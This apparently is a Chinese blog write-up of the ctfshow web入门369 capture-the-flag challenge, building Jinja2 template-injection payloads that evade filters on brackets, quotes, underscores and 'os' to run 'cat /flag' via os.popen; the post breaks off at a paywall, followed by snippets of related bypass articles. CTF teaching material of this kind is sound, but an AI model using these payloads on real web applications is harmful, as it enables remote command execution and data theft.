SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号被过滤绕过(ctfshow web入门369)

原创 已于 2023-03-30 16:03:41 修改 · 3.7k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全 #web安全

于 2023-03-30 11:33:14 首次发布
本文详细介绍了如何在SSTI漏洞中,通过一系列的字符串拼接和方法调用来绕过过滤限制,包括获取__globals__、os模块、popen方法,以及执行shell命令读取flag的过程。

SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号被过滤绕过(ctfshow web入门369)

写在前面

由于request被过滤,我们就不能再使用传参的方式进行传递命令以及被过滤的关键字,下划线中括号花括号都被过滤,这样的话我们就只能使用{%%}来进行设置变量以及拼接方法的方式来进行利用SSTI漏洞。

实例引入

本章内容,咱们就先研究怎么做出ctfshow web入门369这道题目,然后再讲解绕过的原理。

判断是否存在SSTI模板注入漏洞

由于双花括号被过滤,我们只能使用{%%}来判断,我们传入参数?name={%print 123%},来观察页面是否回显123,如果回显123即存在SSTI模板注入漏洞。

http://31f447da-596e-4394-bf87-806bf07e2454.challenge.ctf.show/
?name={
   
   %print 123%}

在这里插入图片描述
页面回显123,存在SSTI模板注入漏洞。

拼接payload

我们先确定我们使用哪一个payload去打它,我们就以:

{
   
   %print ((lipsum)|attr("__globals__")).get("os").popen("cat /flag").read()%}

我们分析一下:
引号、下划线被过滤,我们不能直接使用" attr(“__globals__”) ",并且request被过滤,不能通过传参,我们就只能通过拼接字符串的方式获取,并且后面的get方法、popen方法、os模块、shell命令都要采取拼接完成。

获取__globals__
获取globals字符串
http://31f447da-596e-4394-bf87-806bf07e2454.challenge.ctf.show/
?name={
   
   %set globals=dict(globals=a)|join%}
{
   
   %print globals%}

在这里插入图片描述

获取下划线

我们获得了globals字符串,还需要下划线来拼接,那么下划线如何获取呢?
我们就通过lipsum|string|list中获取。

http://31f447da-596e-4394-bf87-806bf07e2454.challenge.ctf.show/
?name={
   
   %print lipsum|string|list%}

在这里插入图片描述

获取pop方法

我们知道从哪里获取下划线之后,但是要考虑如何使用索引值来获取,这时我们就想到了pop()方法。pop()方法可以通过传入列表元素的索引值将列表中的该元素删除并返回该元素的值。

http://31f447da-596e-4394-bf87-806bf07e2454.challenge.ctf.show/
?name={
   
   %set pop=dict(po=a,p=b)|join%}
{
   
   %print pop%}

在这里插入图片描述
这样的话我们就可以获取到下划线了。

http://31f447da-596e-4394-bf87-806bf07e2454.challenge.ctf.show/
?name={
   
   %set pop=dict(po=a,p=b)|join%}
{
   
   %set xiahuaxian=(lipsum|string|list)|attr(pop)(24)%}
{
   
   %print xiahuaxian%}

在这里插入图片描述
获取下划线之后也就自然能获得__globals__。

http://31f447da-596e-4394-bf87-806bf07e2454.challenge.ctf.show/
?name={
   
   %set pop=dict(po=a,p=b)|join%}
{
   
   %set xiahuaxian=(lipsum|string|list)|attr(pop)(24)%}
{
   
   %set globals=dict(globals=a)|join%}
{
   
   %print (xiahuaxian,xiahuaxian,globals,xiahuaxian,xiahuaxian)|join%}

在这里插入图片描述

获取os模块
获取os字符串

先获取到os字符。

http://31f447da-596e-4394-bf87-806bf07e2454.challenge.ctf.show/
?name={
   
   %set shell=dict(o=a,s=b)|join%}
{
   
   %print shell%}

在这里插入图片描述

获取get()方法

获取get,以便我们使用get()获取到os模块。

http://31f447da-596e-4394-bf87-806bf07e2454.challenge.ctf.show/
?name={
   
   %set get=dict(get=a)|join%}
{
   
   %print get%}

在这里插入图片描述

http://31f447da-596e-4394-bf87-806bf07e2454.challenge.ctf.show/
?name={
   
   <
最低0.47元/天 解锁文章
SSTI模板注入-中括号args下划线双引号过滤绕过ctfshow web入门366)
你们de4月天的博客
03-29 1209
SSTI模板注入漏洞,ctfshow web入门366 引号过滤双引号过滤args过滤中括号过滤下划线过滤
ctfshow-web369(SSTI)
m0_62094846的博客
05-06 636
过滤request,之前的方法都不能用了,直接用终极代码 ?name= {% set po=dict(po=a,p=a)|join%} {% set a=(()|select|string|list)|attr(po)(24)%} {% set ini=(a,a,dict(init=a)|join,a,a)|join()%} {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%} {% set geti=(a,a,dict(getitem=a)|joi..
SSTI模板注入-中括号args下划线双引号、双大括号过滤绕过ctfshow web入门368)
你们de4月天的博客
03-29 1531
SSTI模板注入漏洞 中括号args下划线双引号、双大括号过滤 ctfshow web入门368
SSTI模板注入-中括号args下划线双引号osrequest括号、数字被过滤绕过ctfshow web入门370)
你们de4月天的博客
03-30 2112
ctfshow web入门370 中括号argsrequest下划线引号括号、数字、os过滤 SSTI模板注入漏洞
ctfshow SSTI注入 web369--web372
2301_81040377的博客
07-25 997
研究了一下发现只有curl可以用,nc\ping\weget都不可以。发现count被禁用 使用length代替。这把request过滤了,只能自己拼字符了。过滤了数字用全角数字代替半角数字。拓展知识,与本题无关。
ctfshow-web入门-SSTIweb369-web372)下
Welcome To Myon'Blog !
11-15 1221
当然,我们也可以按照上一题 {%print((lipsum|attr(gl)|string|list).pop(431))%} 的方法定位斜杠的位置,继续做拼接,按理来说是可行的,各位自行尝试,我只是觉得那样做复杂了。重新找一遍太折腾了,我们这里换 payload,不再构造数字了,直接用全角数字替换半角数字。看了其他wp发现这道题有更简的方法,大家自行摸索,我这里还是做复杂了。因此我们前面构造的字符就会有区别,需要重新定位字符的位置。上一题演示的是外带,这里我们尝试反弹 shell。
SSTI模板注入-中括号args双引号过滤绕过ctfshow web入门365)
你们de4月天的博客
03-28 2465
SSTI模板注入漏洞——中括号双引号args过滤ctfshow web入门365
SSTI模板注入-中括号argsos下划线双引号过滤绕过ctfshow web入门367)
你们de4月天的博客
03-29 739
ctfshow web入门367 SSTI模板注入漏洞 中括号argsos下划线双引号过滤
SSTI模块注入SSTI+Flask+Python(下):绕过过滤
07-25 3487
SSTI绕过过滤
SSTI模板注入绕过(进阶篇)
热门推荐
羽的博客
12-11 2万+
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例,根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the templat
SSTI模板注入-常用的一些绕过
九尾ww的博客
10-27 686
漏洞成因:服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。 python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式 1.过滤[]等括号 使用gititem绕过。如原poc {{"".class.bases[0]}} 绕过后{{"".class.bases.getitem(0)}}
CTFSHOW SSTI web369-web372 拼接绕过
Je3Z的博客
03-28 1243
知识点: ()|select|string 结果如下 <generator object select_or_reject at 0x0000022717FF33C0> (()|select|string)[24]~ (()|select|string)[24]~ (()|select|string)[15]~ (()|select|string)[20]~ (()|select|string)[6]~ (()|select|string)[18]~ (()|select|string)[18
ctfshow-web入门-SSTIweb361-web368)上
Welcome To Myon'Blog !
11-13 1305
这个 payload 是一次性的,因为 pop 会删除里面的键,导致环境崩溃。对于这种没有过滤的,还有其他很多很多方法,这里就不列举了。前面的 payload 太长了,构造起来比较麻烦和乱。更保险的是使用 __getitem__ ,方法同上。(1)使用子类可以直接调用的函数来打。模糊测试看一下,过滤了 2 和 3。双大括号过滤request。测试一下存在 SSTI 注入。并且 post 传参不允许。那就传给 cookie 吧。但是 {% %} 中可用。一起传给 cookie。
关于SSTI模块注入的常见绕过方法
Welcome To Myon'Blog !
07-05 2663
1、过滤中括号 2、过滤了双下划线 3、过滤下划线 4、过滤了点 5、过滤了大括号 6、过滤引号 7、过滤了数字
ctfshow web入门SSTI
m0_62422842的博客
06-18 1729
ctfshowweb入门ssti题目的总结
最全SSTI模板注入waf绕过总结(6700+字数!)
2301_76690905的博客
11-09 9305
详细介绍了各种方法绕过混合过滤,关键字过滤,各种符号过滤,点过滤下划线过滤双引号过滤,很齐全
SSTI模板注入-中括号args下划线双引号osrequest括号、数字、print、(372过滤了count)过滤绕过ctfshow web入门371-372)
你们de4月天的博客
03-30 613
CTFshow web入门371 CTFshow web入门372 中括号args下划线引号osrequest括号、数字、print、(372过滤了count) SSTI模板注入漏洞
SSTI注入
这个人很懒,什么都懒得写
01-21 1240
SSTI二次学习
SSTI模板注入详细总结及WAF绕过
2301_76690905的博客
11-15 4923
模板引擎是用于Web开发的工具,其作用是将用户界面和业务数据分离。通过模板引擎,我们可以根据特定的格式要求生成文档。使用模板引擎,我们只需要提供用户数据,然后将数据传递给渲染函数,模板引擎会根据提供的数据生成对应的前端HTML页面,最终呈现在用户的浏览器中。
ctfshow web入门ssti
最新发布
01-25
### CTFShow Web 入门 SSTI 教程 #### 题目描述 在一个基于 PHP 的 Web 应用中,存在一个可以接受用户输入并渲染到网页上的功能。该功能使用了模板引擎来处理用户的输入数据。 #### 解题思路 在服务器端模板注入 (Server-Side Template Injection, SSTI) 攻击中,攻击者利用应用程序中的漏洞向模板引擎传递恶意代码,从而实现远程命令执行或其他危害行为。对于本道题目而言: - **确认使用的模板引擎** 如果应用采用的是 Twig 或其他支持复杂表达式的模板库,则可能存在 SSTI 漏洞的风险[^2]。 - **测试是否存在 SSTI 漏洞** 可以尝试提交一些特殊的字符串作为输入,观察其输出结果是否有异常变化。例如,发送 `{{7*7}}` 并期望看到计算的结果而不是原始字符本身被显示出来。 - **探索可利用的功能** 当发现确实能够影响模板解析过程之后,下一步就是要找出如何进一步控制这些操作。这可能涉及到调用内置函数、读取文件内容甚至是执行系统指令等动作。 针对此案例的具体解法如下所示: 假设目标站点有一个 URL 参数名为 `name` ,用于接收用户名字并在页面上展示欢迎信息。此时可以通过构造特定形式的数据包来进行试探性的攻击尝试: ```http GET /index.php?name={{7*'a'}} HTTP/1.1 Host: example.com ``` 如果返回的内容包含了七个连续的小写字母 'aaaaaaa' 而不是原样呈现 {{7*'a'}}, 则说明很可能存在 SSTI 缺陷。 为了验证这一点以及获取更多权限,还可以继续深入挖掘可用的方法。比如查看当前工作目录下的所有文件列表: ```http GET /index.php?name={{self._env.__init__.__globals__['os'].getcwd()}} HTTP/1.1 Host: example.com ``` 一旦成功触发上述语句并将路径反馈至前端界面,就意味着已经掌握了对服务器内部结构的部分了解,进而为进一步渗透提供了条件。 当然,在实际环境中应当遵循合法合规的原则开展安全研究活动,严禁非法入侵他人信息系统的行为发生。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你们de4月天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值